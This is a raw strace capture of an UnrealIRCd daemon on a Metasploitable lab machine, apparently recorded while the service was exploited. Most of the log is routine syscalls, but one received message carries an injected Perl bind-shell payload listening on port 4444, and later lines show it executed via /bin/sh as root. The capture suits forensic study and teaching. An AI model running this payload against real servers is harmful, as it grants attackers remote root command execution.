4519  07:10:52.450849 select(1024, [2 3 4 7 9], [], NULL, {0, 680000}) = 1 (in [7], left {0, 640000})

4519  07:10:52.489218 clock_gettime(CLOCK_MONOTONIC, {1062, 306237516}) = 0

4519  07:10:52.489239 recv(7, "PRIVMSG  #testit2 ABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 45

4519  07:10:52.489270 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489289 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489304 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489318 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489332 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489346 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489359 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489373 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489386 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489400 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489413 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489427 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489441 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489454 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489467 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489481 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489494 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489507 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489521 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489535 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489548 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489562 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.489577 time(NULL)        = 1495624252

4519  07:10:52.489589 time(NULL)        = 1495624252

4519  07:10:52.489602 gettimeofday({1495624252, 489605}, NULL) = 0

4519  07:10:52.489621 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:10:52.489707 clock_gettime(CLOCK_MONOTONIC, {1062, 306720866}) = 0

4519  07:10:52.489719 gettimeofday({1495624252, 489722}, NULL) = 0

4519  07:10:52.489730 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 860000})

4519  07:10:52.632028 clock_gettime(CLOCK_MONOTONIC, {1062, 449051565}) = 0

4519  07:10:52.632055 accept(2, 0, NULL) = 5

4519  07:10:52.632083 getpeername(5, {sa_family=AF_INET, sin_port=htons(34817), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:10:52.632128 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:10:52.632160 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:10:52.632179 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:10:52.632198 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:10:52.632215 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:10:52.632232 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:10:52.632251 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:10:52.632276 clock_gettime(CLOCK_MONOTONIC, {1062, 449292469}) = 0

4519  07:10:52.632362 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:10:52.632383 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:10:52.632398 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:10:52.632411 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:10:52.632426 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:10:52.632527 send(6, "\376\352\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:10:52.632606 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:10:52.632638 gettimeofday({1495624252, 632645}, NULL) = 0

4519  07:10:52.632657 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:10:52.635568 clock_gettime(CLOCK_MONOTONIC, {1062, 452589226}) = 0

4519  07:10:52.635590 recvfrom(6, "\376\352\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0p\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:10:52.635632 close(6)          = 0

4519  07:10:52.635648 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:10:52.635664 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:10:52.635725 time(NULL)        = 1495624252

4519  07:10:52.635738 time(NULL)        = 1495624252

4519  07:10:52.635769 gettimeofday({1495624252, 635773}, NULL) = 0

4519  07:10:52.635796 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:10:52.635825 clock_gettime(CLOCK_MONOTONIC, {1062, 452838144}) = 0

4519  07:10:52.635836 gettimeofday({1495624252, 635839}, NULL) = 0

4519  07:10:52.635846 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 940000})

4519  07:10:52.688382 clock_gettime(CLOCK_MONOTONIC, {1062, 505402245}) = 0

4519  07:10:52.688404 recv(4, "PRIVMSG  #testit BLABLALBLALBLALBLALBLALBLALBLALABLLALBLA\n", 8192, 0) = 58

4519  07:10:52.688429 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688447 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688462 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688476 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688490 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688504 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688517 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688531 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688545 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688558 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688572 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688586 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688599 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688613 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688626 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688640 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688653 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688667 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688680 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688694 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688708 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688722 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 90000}, ...}) = 0

4519  07:10:52.688738 gettimeofday({1495624252, 688742}, NULL) = 0

4519  07:10:52.688751 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:10:52.688792 clock_gettime(CLOCK_MONOTONIC, {1062, 505805245}) = 0

4519  07:10:52.688804 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:10:52.688849 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:10:52.688871 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:10:52.688884 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:10:52.688899 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 5822

5822  07:10:52.688966 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

5822  07:10:52.688980 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

5822  07:10:52.688991 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5822  07:10:52.689005 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

5822  07:10:52.689116 brk(0)            = 0x80f9000

5822  07:10:52.689139 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5822  07:10:52.689157 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fbd000

5822  07:10:52.689173 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

5822  07:10:52.689191 open("/etc/ld.so.cache", O_RDONLY) = 1

5822  07:10:52.689204 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5822  07:10:52.689222 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fb5000

5822  07:10:52.689233 close(1)          = 0

5822  07:10:52.689244 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5822  07:10:52.689259 open("/lib/libncurses.so.5", O_RDONLY) = 1

5822  07:10:52.689272 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

5822  07:10:52.689376 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

5822  07:10:52.689395 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f85000

5822  07:10:52.689408 mmap2(0xb7fb2000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7fb2000

5822  07:10:52.689425 close(1)          = 0

5822  07:10:52.689437 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5822  07:10:52.689451 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

5822  07:10:52.689466 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

5822  07:10:52.689559 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

5822  07:10:52.689576 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f81000

5822  07:10:52.689588 mmap2(0xb7f83000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f83000

5822  07:10:52.689603 close(1)          = 0

5822  07:10:52.689615 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5822  07:10:52.689628 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

5822  07:10:52.689642 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

5822  07:10:52.689731 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

5822  07:10:52.689747 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f80000

5822  07:10:52.689761 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e31000

5822  07:10:52.689772 mmap2(0xb7f7a000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f7a000

5822  07:10:52.689786 mmap2(0xb7f7d000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f7d000

5822  07:10:52.689800 close(1)          = 0

5822  07:10:52.689831 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e30000

5822  07:10:52.689844 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e306b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

5822  07:10:52.689907 mprotect(0xb7f7a000, 4096, PROT_READ) = 0

5822  07:10:52.689943 munmap(0xb7fb5000, 29913) = 0

5822  07:10:52.689969 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5822  07:10:52.689983 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

5822  07:10:52.690003 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfeee0b0) = -1 ENOTTY (Inappropriate ioctl for device)

5822  07:10:52.690032 brk(0)            = 0x80f9000

5822  07:10:52.690042 brk(0x80fa000)    = 0x80fa000

5822  07:10:52.690054 brk(0x80fb000)    = 0x80fb000

5822  07:10:52.690070 getuid32()        = 0

5822  07:10:52.690079 getgid32()        = 0

5822  07:10:52.690089 geteuid32()       = 0

5822  07:10:52.690097 getegid32()       = 0

5822  07:10:52.690111 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5822  07:10:52.690124 time(NULL)        = 1495624252

5822  07:10:52.690141 brk(0x80fc000)    = 0x80fc000

5822  07:10:52.690155 brk(0x80fd000)    = 0x80fd000

5822  07:10:52.690175 open("/proc/meminfo", O_RDONLY) = 1

5822  07:10:52.690197 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

5822  07:10:52.690215 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fbc000

5822  07:10:52.690227 read(1, "MemTotal:      1035240 kB\nMemFree:        633532 kB\nBuffers:         63524 kB\nCached:         182980 kB\nSwapCached:          0 kB\nActive:         252108 kB\nInactive:       123352 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        633292 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            5036 kB\nWriteback:           0 kB\nAnonPages:      129008 kB\nMapped:          52008 kB\nSlab:            15116 kB\nSReclaimable:     7128 kB\nSUnreclaim:       7988 kB\nPageTables:       1960 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

5822  07:10:52.690311 close(1)          = 0

5822  07:10:52.690372 munmap(0xb7fbc000, 4096) = 0

5822  07:10:52.690402 brk(0x80fe000)    = 0x80fe000

5822  07:10:52.690429 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

5822  07:10:52.690443 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

5822  07:10:52.690455 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5822  07:10:52.690467 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5822  07:10:52.690479 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

5822  07:10:52.690491 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

5822  07:10:52.690504 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5822  07:10:52.690516 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5822  07:10:52.690529 uname({sys="Linux", node="metasploitable", ...}) = 0

5822  07:10:52.690577 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

5822  07:10:52.690596 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5822  07:10:52.690614 brk(0x8100000)    = 0x8100000

5822  07:10:52.690625 getcwd("/etc/unreal", 4096) = 12

5822  07:10:52.690640 getpid()          = 5822

5822  07:10:52.690656 getppid()         = 4519

5822  07:10:52.690671 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5822  07:10:52.690692 stat64("/sbin/sh", 0xbfeee088) = -1 ENOENT (No such file or directory)

5822  07:10:52.690706 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

5822  07:10:52.690723 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

5822  07:10:52.690747 socket(PF_FILE, SOCK_STREAM, 0) = 1

5822  07:10:52.690761 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

5822  07:10:52.690773 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

5822  07:10:52.690794 close(1)          = 0

5822  07:10:52.690806 socket(PF_FILE, SOCK_STREAM, 0) = 1

5822  07:10:52.690825 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

5822  07:10:52.690836 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

5822  07:10:52.690855 close(1)          = 0

5822  07:10:52.690869 open("/etc/nsswitch.conf", O_RDONLY) = 1

5822  07:10:52.690883 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

5822  07:10:52.690900 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fbc000

5822  07:10:52.690911 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

5822  07:10:52.690964 read(1, "", 4096) = 0

5822  07:10:52.690974 close(1)          = 0

5822  07:10:52.690984 munmap(0xb7fbc000, 4096) = 0

5822  07:10:52.691000 open("/etc/ld.so.cache", O_RDONLY) = 1

5822  07:10:52.691012 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5822  07:10:52.691029 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fb5000

5822  07:10:52.691039 close(1)          = 0

5822  07:10:52.691050 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5822  07:10:52.691065 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

5822  07:10:52.691079 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 